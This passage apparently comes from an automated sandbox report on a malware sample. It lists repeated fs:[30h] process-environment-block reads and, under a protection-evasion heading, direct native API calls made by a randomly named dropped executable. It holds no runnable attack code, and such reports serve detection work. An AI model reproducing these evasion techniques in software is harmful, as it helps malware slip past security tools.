                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B03E9 mov eax, dword ptr fs:[00000030h]4_2_017B03E9
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA3C0 mov eax, dword ptr fs:[00000030h]4_2_017AA3C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A83C0 mov eax, dword ptr fs:[00000030h]4_2_017A83C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01822349 mov eax, dword ptr fs:[00000030h]4_2_01822349
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0186A352 mov eax, dword ptr fs:[00000030h]4_2_0186A352
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01848350 mov ecx, dword ptr fs:[00000030h]4_2_01848350
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov ecx, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182035C mov eax, dword ptr fs:[00000030h]4_2_0182035C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01798397 mov eax, dword ptr fs:[00000030h]4_2_01798397
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E388 mov eax, dword ptr fs:[00000030h]4_2_0179E388
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C438F mov eax, dword ptr fs:[00000030h]4_2_017C438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C438F mov eax, dword ptr fs:[00000030h]4_2_017C438F
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184437C mov eax, dword ptr fs:[00000030h]4_2_0184437C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01820283 mov eax, dword ptr fs:[00000030h]4_2_01820283
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179826B mov eax, dword ptr fs:[00000030h]4_2_0179826B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A4260 mov eax, dword ptr fs:[00000030h]4_2_017A4260
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov ecx, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018362A0 mov eax, dword ptr fs:[00000030h]4_2_018362A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A6259 mov eax, dword ptr fs:[00000030h]4_2_017A6259
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179A250 mov eax, dword ptr fs:[00000030h]4_2_0179A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179823B mov eax, dword ptr fs:[00000030h]4_2_0179823B
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02E1 mov eax, dword ptr fs:[00000030h]4_2_017B02E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AA2C3 mov eax, dword ptr fs:[00000030h]4_2_017AA2C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01828243 mov eax, dword ptr fs:[00000030h]4_2_01828243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01828243 mov ecx, dword ptr fs:[00000030h]4_2_01828243
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A250 mov eax, dword ptr fs:[00000030h]4_2_0185A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A250 mov eax, dword ptr fs:[00000030h]4_2_0185A250
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02A0 mov eax, dword ptr fs:[00000030h]4_2_017B02A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B02A0 mov eax, dword ptr fs:[00000030h]4_2_017B02A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01850274 mov eax, dword ptr fs:[00000030h]4_2_01850274
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE284 mov eax, dword ptr fs:[00000030h]4_2_017DE284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE284 mov eax, dword ptr fs:[00000030h]4_2_017DE284
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D656A mov eax, dword ptr fs:[00000030h]4_2_017D656A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018205A7 mov eax, dword ptr fs:[00000030h]4_2_018205A7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8550 mov eax, dword ptr fs:[00000030h]4_2_017A8550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8550 mov eax, dword ptr fs:[00000030h]4_2_017A8550
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE53E mov eax, dword ptr fs:[00000030h]4_2_017CE53E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0535 mov eax, dword ptr fs:[00000030h]4_2_017B0535
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01836500 mov eax, dword ptr fs:[00000030h]4_2_01836500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01874500 mov eax, dword ptr fs:[00000030h]4_2_01874500
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC5ED mov eax, dword ptr fs:[00000030h]4_2_017DC5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC5ED mov eax, dword ptr fs:[00000030h]4_2_017DC5ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A25E0 mov eax, dword ptr fs:[00000030h]4_2_017A25E0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CE5E7 mov eax, dword ptr fs:[00000030h]4_2_017CE5E7
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A65D0 mov eax, dword ptr fs:[00000030h]4_2_017A65D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA5D0 mov eax, dword ptr fs:[00000030h]4_2_017DA5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA5D0 mov eax, dword ptr fs:[00000030h]4_2_017DA5D0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE5CF mov eax, dword ptr fs:[00000030h]4_2_017DE5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE5CF mov eax, dword ptr fs:[00000030h]4_2_017DE5CF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C45B1 mov eax, dword ptr fs:[00000030h]4_2_017C45B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C45B1 mov eax, dword ptr fs:[00000030h]4_2_017C45B1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE59C mov eax, dword ptr fs:[00000030h]4_2_017DE59C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D4588 mov eax, dword ptr fs:[00000030h]4_2_017D4588
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2582 mov eax, dword ptr fs:[00000030h]4_2_017A2582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A2582 mov ecx, dword ptr fs:[00000030h]4_2_017A2582
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017CA470 mov eax, dword ptr fs:[00000030h]4_2_017CA470
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A49A mov eax, dword ptr fs:[00000030h]4_2_0185A49A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179645D mov eax, dword ptr fs:[00000030h]4_2_0179645D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C245A mov eax, dword ptr fs:[00000030h]4_2_017C245A
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182A4B0 mov eax, dword ptr fs:[00000030h]4_2_0182A4B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DE443 mov eax, dword ptr fs:[00000030h]4_2_017DE443
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DA430 mov eax, dword ptr fs:[00000030h]4_2_017DA430
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179E420 mov eax, dword ptr fs:[00000030h]4_2_0179E420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0179C427 mov eax, dword ptr fs:[00000030h]4_2_0179C427
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D8402 mov eax, dword ptr fs:[00000030h]4_2_017D8402
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A04E5 mov ecx, dword ptr fs:[00000030h]4_2_017A04E5
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01826420 mov eax, dword ptr fs:[00000030h]4_2_01826420
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D44B0 mov ecx, dword ptr fs:[00000030h]4_2_017D44B0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A64AB mov eax, dword ptr fs:[00000030h]4_2_017A64AB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0185A456 mov eax, dword ptr fs:[00000030h]4_2_0185A456
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182C460 mov ecx, dword ptr fs:[00000030h]4_2_0182C460
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A8770 mov eax, dword ptr fs:[00000030h]4_2_017A8770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0184678E mov eax, dword ptr fs:[00000030h]4_2_0184678E
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017B0770 mov eax, dword ptr fs:[00000030h]4_2_017B0770
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018547A0 mov eax, dword ptr fs:[00000030h]4_2_018547A0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0750 mov eax, dword ptr fs:[00000030h]4_2_017A0750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2750 mov eax, dword ptr fs:[00000030h]4_2_017E2750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017E2750 mov eax, dword ptr fs:[00000030h]4_2_017E2750
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov esi, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov eax, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D674D mov eax, dword ptr fs:[00000030h]4_2_017D674D
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov eax, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov ecx, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D273C mov eax, dword ptr fs:[00000030h]4_2_017D273C
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_018207C3 mov eax, dword ptr fs:[00000030h]4_2_018207C3
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC720 mov eax, dword ptr fs:[00000030h]4_2_017DC720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC720 mov eax, dword ptr fs:[00000030h]4_2_017DC720
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E7E1 mov eax, dword ptr fs:[00000030h]4_2_0182E7E1
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A0710 mov eax, dword ptr fs:[00000030h]4_2_017A0710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017D0710 mov eax, dword ptr fs:[00000030h]4_2_017D0710
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017DC700 mov eax, dword ptr fs:[00000030h]4_2_017DC700
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A47FB mov eax, dword ptr fs:[00000030h]4_2_017A47FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A47FB mov eax, dword ptr fs:[00000030h]4_2_017A47FB
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017C27ED mov eax, dword ptr fs:[00000030h]4_2_017C27ED
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0181C730 mov eax, dword ptr fs:[00000030h]4_2_0181C730
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017AC7C0 mov eax, dword ptr fs:[00000030h]4_2_017AC7C0
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_017A07AF mov eax, dword ptr fs:[00000030h]4_2_017A07AF
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_01824755 mov eax, dword ptr fs:[00000030h]4_2_01824755
                Source: C:\Users\user\Desktop\file.exeCode function: 4_2_0182E75D mov eax, dword ptr fs:[00000030h]4_2_0182E75D
                Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtOpenKeyEx: Direct from: 0x77672B9C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtProtectVirtualMemory: Direct from: 0x77672F9C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtCreateFile: Direct from: 0x77672FEC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtOpenFile: Direct from: 0x77672DCC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtTerminateThread: Direct from: 0x77672FCC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtProtectVirtualMemory: Direct from: 0x77667B2E
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQueryInformationToken: Direct from: 0x77672CAC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtAllocateVirtualMemory: Direct from: 0x77672BEC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtDeviceIoControlFile: Direct from: 0x77672AEC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQuerySystemInformation: Direct from: 0x776748CC
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtQueryAttributesFile: Direct from: 0x77672E6C
                Source: C:\Program Files (x86)\URTzdhJBzIlajKUsfYsZSiyeaAYbfuyijSBaUZhTWCaGKzzWIqvnLwdYKKzWz\QmkRHPDwxbW.exe NtSetInformationThread: Direct from: 0x77672B4C
